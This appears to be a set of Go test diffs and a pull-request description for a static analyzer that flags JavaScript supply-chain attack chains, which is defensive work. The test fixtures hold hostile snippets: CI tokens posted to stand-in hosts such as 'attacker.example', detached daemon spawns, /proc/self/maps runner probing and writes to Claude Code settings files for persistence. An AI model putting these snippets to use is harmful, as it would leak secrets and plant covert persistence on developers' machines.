+		t.Errorf("ESM import { spawn } from child_process must chain, got: %+v", findings)
+	}
+}
+
+func TestVuln_ESMAliasedImport(t *testing.T) {
+	body := `
+import { spawn as launch } from 'child_process';
+launch('node', ['./payload.js'], { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "esma.mjs", body)
+	if !hasRule(findings, RuleDaemon) {
+		t.Errorf("ESM aliased import (spawn as launch) must chain, got: %+v", findings)
+	}
+}
+
+func TestSafe_BareCallNamedSpawnNotImported(t *testing.T) {
+	// A function literally named `spawn` that has no child_process
+	// origin must not chain even if it carries daemon-shape options.
+	body := `
+function spawn(opts) { return opts; }
+spawn('node', ['x'], { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "ns.js", body)
+	if hasRule(findings, RuleDaemon) {
+		t.Errorf("locally-defined spawn must not chain daemon, got: %+v", findings)
+	}
+}
+
 // --- pass-8 fixes: receiver-bound daemon match, drop .unref()-only chain ---
 
 func TestSafe_WorkerSpawnWithCPImported(t *testing.T) {

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -331,6 +331,64 @@ require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
 	}
 }
 
+// --- pass-1 fixes: narrow network sinks, /proc memory, quoted detached ---
+
+func TestSafe_LocalClientPostNotNetworkSink(t *testing.T) {
+	// A local helper that happens to expose `.post(...)` (e.g. a
+	// pub/sub bus, an ORM, a queue client) must not by itself satisfy
+	// the network-sink half of the harvest chain.
+	body := `
+const queue = require('./local-queue');
+const tok = process.env.GITHUB_TOKEN;
+queue.post({ id: 1, payload: tok });
+`
+	findings := analyze(t, "x.js", body)
+	if hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("local .post(...) must not satisfy network sink, got: %+v", findings)
+	}
+}
+
+func TestSafe_ProcStatNotMemoryAccess(t *testing.T) {
+	// A benign /proc/stat read paired with an OIDC env reference must
+	// not trigger JS_PROC_MEM_OIDC_001: the rule targets
+	// /proc/<pid>/(mem|maps|cmdline) specifically.
+	body := `
+const fs = require('fs');
+const stat = fs.readFileSync('/proc/stat', 'utf8');
+console.log(process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN ? 'yes' : 'no');
+`
+	findings := analyze(t, "stat.js", body)
+	if hasRule(findings, RuleProcMemOIDC) {
+		t.Errorf("/proc/stat alone must not trigger ProcMemOIDC, got: %+v", findings)
+	}
+}
+
+func TestVuln_Daemon_QuotedDetachedProperty(t *testing.T) {
+	// JSON-style spawn options must still chain.
+	body := `
+const cp = require('child_process');
+const child = cp.spawn('node', ['./payload.js'], {"detached": true, "stdio": "ignore"});
+child.unref();
+`
+	findings := analyze(t, "q.js", body)
+	if !hasRule(findings, RuleDaemon) {
+		t.Errorf("quoted \"detached\": true must trigger daemon, got: %+v", findings)
+	}
+}
+
+func TestVuln_ProcMemSelfMaps(t *testing.T) {
+	// /proc/self/maps with Runner.Worker reference is the canonical
+	// runner-pivot shape.
+	body := `
+const maps = require('fs').readFileSync('/proc/self/maps');
+if (maps.includes('Runner.Worker')) { /* found runner */ }
+`
+	findings := analyze(t, "rm.js", body)
+	if !hasRule(findings, RuleProcMemOIDC) {
+		t.Errorf("/proc/self/maps + Runner.Worker must trigger, got: %+v", findings)
+	}
+}
+
 // --- finding shape regression ---
 
 func TestFindingsHaveStableFields(t *testing.T) {

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -331,6 +331,56 @@ require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
 	}
 }
 
+// --- pass-2 fixes: inline require chain sinks + quoted stdio ---
+
+func TestVuln_CISecretHarvest_InlineRequireHttpsRequest(t *testing.T) {
+	// Compact payload form: require('https').request(...) without
+	// binding the module first. Must still satisfy the network sink.
+	body := `
+const t = process.env.GITHUB_TOKEN;
+require('https').request({hostname:'attacker.example', method:'POST'}).end(t);
+`
+	findings := analyze(t, "i.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("require('https').request inline form must trigger harvest, got: %+v", findings)
+	}
+}
+
+func TestVuln_CISecretHarvest_InlineRequireHttpRequest(t *testing.T) {
+	body := `
+const t = process.env.NPM_TOKEN;
+require("http").request("http://attacker/x", {method:"POST"}).end(t);
+`
+	findings := analyze(t, "i2.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("require(\"http\").request inline form must trigger harvest, got: %+v", findings)
+	}
+}
+
+func TestVuln_CISecretHarvest_NodeSchemeRequire(t *testing.T) {
+	body := `
+const t = process.env.GITHUB_TOKEN;
+require('node:https').request({hostname:'attacker.example'}).end(t);
+`
+	findings := analyze(t, "n.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("node: scheme require + token must trigger harvest, got: %+v", findings)
+	}
+}
+
+func TestVuln_Daemon_QuotedStdioWithoutUnref(t *testing.T) {
+	// JSON-quoted spawn options with quoted stdio but no .unref() must
+	// still satisfy the daemon shape via stdio:'ignore'.
+	body := `
+const cp = require('child_process');
+cp.spawn('node', ['./payload.js'], {"detached": true, "stdio": "ignore"});
+`
+	findings := analyze(t, "qs.js", body)
+	if !hasRule(findings, RuleDaemon) {
+		t.Errorf("quoted stdio:'ignore' must trigger daemon, got: %+v", findings)
+	}
+}
+
 // --- pass-1 fixes: narrow network sinks, /proc memory, quoted detached ---
 
 func TestSafe_LocalClientPostNotNetworkSink(t *testing.T) {

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -331,6 +331,61 @@ require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
 	}
 }
 
+// --- pass-3 fixes: property boundary on daemon options + proximate /proc subpath ---
+
+func TestSafe_NotDetachedOption(t *testing.T) {
+	// A spawn option literally named `notdetached: true` (or
+	// `isDetached: true`) must not satisfy the detached signal.
+	body := `
+const cp = require('child_process');
+cp.spawn('node', ['x'], { notdetached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "n.js", body)
+	if hasRule(findings, RuleDaemon) {
+		t.Errorf("notdetached:true must not chain daemon, got: %+v", findings)
+	}
+}
+
+func TestSafe_IsDetachedHelperVar(t *testing.T) {
+	body := `
+const cp = require('child_process');
+const isDetached = true;
+cp.spawn('node', ['x'], { stdio: 'ignore' });
+`
+	findings := analyze(t, "i.js", body)
+	if hasRule(findings, RuleDaemon) {
+		t.Errorf("isDetached helper var must not chain daemon, got: %+v", findings)
+	}
+}
+
+func TestSafe_IsStdioPropertyDoesNotMatch(t *testing.T) {
+	// `isStdio: 'ignore'` must not satisfy the stdio signal.
+	body := `
+const cp = require('child_process');
+cp.spawn('node', ['x'], { detached: true, isStdio: 'ignore' });
+`
+	findings := analyze(t, "is.js", body)
+	if hasRule(findings, RuleDaemon) {
+		t.Errorf("isStdio property must not chain stdio, got: %+v", findings)
+	}
+}
+
+func TestSafe_UnrelatedProcAndCmdlineFarApart(t *testing.T) {
+	// A /proc/stat read at the top of a file and an unrelated 'cmdline'
+	// identifier near the bottom must not chain as memory access.
+	body := `
+const stat = require('fs').readFileSync('/proc/stat');
+// ... many lines of code ...
+` + strings.Repeat("// padding line\n", 30) + `
+const myCmdline = 'this is just an identifier';
+const t = process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN;
+`
+	findings := analyze(t, "f.js", body)
+	if hasRule(findings, RuleProcMemOIDC) {
+		t.Errorf("far-apart /proc/stat + cmdline must not chain, got: %+v", findings)
+	}
+}
+
 // --- pass-2 fixes: inline require chain sinks + quoted stdio ---
 
 func TestVuln_CISecretHarvest_InlineRequireHttpsRequest(t *testing.T) {

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -331,6 +331,45 @@ require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
 	}
 }
 
+// --- pass-13 fixes: fetch local-method boundary + inline https.get ---
+
+func TestSafe_LocalFetchMethod(t *testing.T) {
+	// `.fetch(...)` on an unrelated object paired with a CI token
+	// read must not satisfy the network sink.
+	body := `
+const cache = makeCache();
+const t = process.env.GITHUB_TOKEN;
+cache.fetch({ token: t });
+`
+	findings := analyze(t, "lf.js", body)
+	if hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("local .fetch() must not chain harvest, got: %+v", findings)
+	}
+}
+
+func TestVuln_GlobalFetchStillFires(t *testing.T) {
+	// Global fetch (or `await fetch`) must still chain.
+	body := `
+const t = process.env.GITHUB_TOKEN;
+await fetch('https://attacker/x', {method:'POST', body:t});
+`
+	findings := analyze(t, "gf.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("global fetch must still chain harvest, got: %+v", findings)
+	}
+}
+
+func TestVuln_InlineHttpsGet(t *testing.T) {
+	body := `
+const t = process.env.GITHUB_TOKEN;
+require('https').get('https://attacker/x?t=' + encodeURIComponent(t));
+`
+	findings := analyze(t, "ig.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("require('https').get(...) inline must chain harvest, got: %+v", findings)
+	}
+}
+
 // --- pass-12 fixes: $-prefixed aliases + computed env reads ---
 
 func TestVuln_DollarPrefixedCPAlias(t *testing.T) {


### PR DESCRIPTION
## Summary

Adds a new analyzer in `internal/engine/jsrisk` that detects supply-chain risk chains in JavaScript files (`.js`, `.mjs`, `.cjs`). The analyzer runs a single linear pass over the content plus a handful of compiled-once regex matches. It never executes scripts and never deobfuscates dynamically.

### New rule IDs (category: `supply-chain`, analyzer: `jsrisk`)

| Rule | Trigger |
|---|---|
| `JS_OBF_001` | Obfuscator-shape payload: at least one obfuscator-specific signal (>100 `_0xHEX` identifiers, >100 dispatcher calls, or a `while(!![])` loop) plus a second signal. MEDIUM by default; HIGH when combined with `process.env`, child_process, or a network sink. |
| `JS_DAEMON_001` | A real child_process invocation whose own arguments (paren-balanced, string-aware) carry both `detached: true` AND `stdio: 'ignore'`. HIGH; CRITICAL with secret read or registry sink in the same file. |
| `JS_CI_SECRET_HARVEST_001` | A real `process.env` read of a CI/cloud secret (covers direct, bracket, optional-chaining, template-bracket, and destructured forms including aliases and ESM imports) plus a network/publish/GitHub-GraphQL/session sink. CRITICAL. |
| `JS_PROC_MEM_OIDC_001` | `/proc/<pid>/(mem\|maps\|cmdline)` access (literal or quoted-fragment form) plus `ACTIONS_ID_TOKEN_REQUEST_*` or `Runner.Worker` reference. CRITICAL. |
| `AGENT_PERSISTENCE_001` | Reference to a Claude Code automation file (`.claude/settings.json`, `.claude/router_runtime.js`, `.claude/setup.mjs`, `.claude/hooks/`) OR the pair `.vscode/tasks.json` + `runOn: folderOpen`. HIGH; CRITICAL with secret harvest or daemonization. |

### False-positive policy (chain-first)

Each rule requires multiple aligned signals tied to the same call site or syntactic structure. Specifically:

- Minified vendor bundles (size + line-length only) do not satisfy `JS_OBF_001` without an obfuscator-specific signal.
- `worker.spawn(...)` on an unrelated object does not satisfy `JS_DAEMON_001`; the receiver must be either the inline `require('child_process')` chain, an alias actually bound from `require('child_process')` / `import ... from 'child_process'` (including `import * as`, default, and aliased destructure forms with `$`-prefixed identifiers), or a bare-form destructure name (with the local binding preserved through `:` and `as` aliases).
- Daemon options are paren-balanced inside the call's own arguments, so options belonging to a different nearby call cannot satisfy the rule.
- A documentation mention of `GITHUB_TOKEN` does not satisfy `JS_CI_SECRET_HARVEST_001`; the secret must be read through `process.env`.
- Aliased HTTP/HTTPS/net imports (`const h = require('https'); h.request(...)`) count as network sinks; an unrelated local `net` variable does not.
- `cache.fetch(...)` and similar local methods do not satisfy the fetch sink (JS identifier boundary excludes a leading `.`).
- `/proc/meminfo` and `/proc/cmdline` (root-level files) do not satisfy the runner-pivot rule; per-process subpaths do.
- `.vscode/setup.mjs` alone does not chain persistence; VS Code persistence requires `.vscode/tasks.json` + `runOn: folderOpen`.
- `notdetached: true`, `isStdio: 'ignore'`, etc. do not satisfy the daemon options (property-boundary anchored regex).

### Wiring

Registered after `pkgmeta` and before NLP in all three scanner builders (`aguara.Scan`, `Scanner.buildInternalScanner`, CLI `scan`). Public `Finding` JSON schema unchanged. No new categories. No new flags. No new dependencies (`bytes`, `regexp`, `strings` are stdlib).

## Test plan

- [x] `make build` passes.
- [x] `make test` clean across all packages.
- [x] `make vet` clean.
- [x] `make lint` reports `0 issues.`
- [x] 50+ test cases in `internal/engine/jsrisk` covering target gating, classifier boundary conditions (`fetch` vs `.fetch`, `$`-prefixed aliases, JS identifier boundary, optional chaining, template-literal bracket keys, aliased destructure with `:` and `as`), each rule's positive and negative chains, severity escalation paths, and end-to-end multi-rule emission with distinct line anchors.
- [x] E2E CLI smoke against a hand-crafted vulnerable payload produces four CRITICAL findings on distinct lines.

## Known residual

One cross-cutting follow-up surfaced during review and is deferred to its own PR: analyzer-emitted rule IDs (`JS_*`, `AGENT_PERSISTENCE_001`, `GHA_*`, `NPM_*`, `TOXIC_*`, `RUGPULL_001`) are visible in scan output but do not appear in `aguara list-rules` or `aguara explain <id>`, since both helpers iterate the compiled pattern-rule list. `--disable-rule` already covers these IDs (resolved in #71); list/explain coverage is the next step. The fix belongs in a single PR that threads analyzer metadata through the rule catalog uniformly across `internal/engine/*`, not in a per-analyzer landing PR.

## Out of scope

Further analyzers and rules in the same line of work (targeted YAML IOC rules, npm package/version IOCs) land in separate PRs.